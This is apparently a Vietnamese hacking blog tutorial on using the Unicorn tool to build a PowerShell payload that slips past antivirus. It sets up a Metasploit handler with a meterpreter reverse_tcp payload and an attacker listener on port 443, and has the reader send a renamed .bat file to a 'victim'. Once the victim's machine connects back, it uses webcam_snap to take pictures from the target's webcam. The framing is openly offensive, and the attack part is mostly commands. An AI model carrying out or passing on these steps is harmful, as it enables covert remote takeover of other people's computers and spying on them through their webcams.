0 Unicorn - Tấn công PowerShell - Chống lại chương trình Anti Virus

---

No Hacking No Life

---

Unicorn.

Unicorn là gì?

Unicorn là một công cụ đơn giản được sử dụng cho một cuộc tấn công PowerShell và Tiêm ShellCode thẳng vào bộ nhớ.

Để bắt đầu, chúng ta cần phải tải Unicorn bằng cách truy cập vào links sau :

(Đây là công cụ 1 anh nước ngoài , hiện mình chỉ dịch 1 vài chỗ chứ chưa phải hoàn toàn nên hiện xin cứ dùng bản Việt Hóa tạm thời ạ)

Links download : http://shink.in/nk1uc

Tiếp theo , bạn mở terminal và khởi động metasploit lên:
[[mcode]]# service postgresql start
# msfconsole[[ecode]]

Kết quả như hình.

Giao diện msfconsole.

Tiếp theo chúng ta cần bật một ứng dụng lắng nghe của msf:

[[mcode]]msf > use exploit/multi/handler[[ecode]]

Chọn exploit là handler.

Sử dụng payload meterpreter, bạn có thể tìm hiểu thêm về payload meterpreter:
[[mcode]]msf exploit(handler) > set payload windows/meterpreter/reverse_tcp[[ecode]]

Chọn payload là meterpreter.

Bây giờ chúng ta cần thiết lập LHOST của chúng ta, tức là địa chỉ ip của máy attacker:
[[mcode]]msf exploit(handler) > set lhost 192.168.43.49[[ecode]]

Đặt listen host.

Tiếp theo là listen port:
[[mcode]]msf exploit(handler) > set lport 443[[ecode]]

Đặt listen port.

Bắt đầu cho chạy handler:
[[mcode]]msf exploit(handler) > exploit[[ecode]]

Chạy exploit handler.

Như vậy coi như bạn đã xong , giờ chúng ta chỉ cần gửi cho victim file được chọn làm mục tiêu bằng cách dán lệnh powershell_attacks.txt trong cửa sổ nhắc lệnh bất kỳ.

Mình sẽ đổi tên powershell_attack.bat và thực hiện chạy nó trên máy mục tiêu.

Và đây là ở máy của Attacker :

Đã bắt được cá~

Ví dụ để sẽ chụp màn hình từ webcam mục tiêu:
[[mcode]]meterpreter > webcam_snap[[ecode]]

Video demo từ tác giả:

Chúc cả nhà thành công !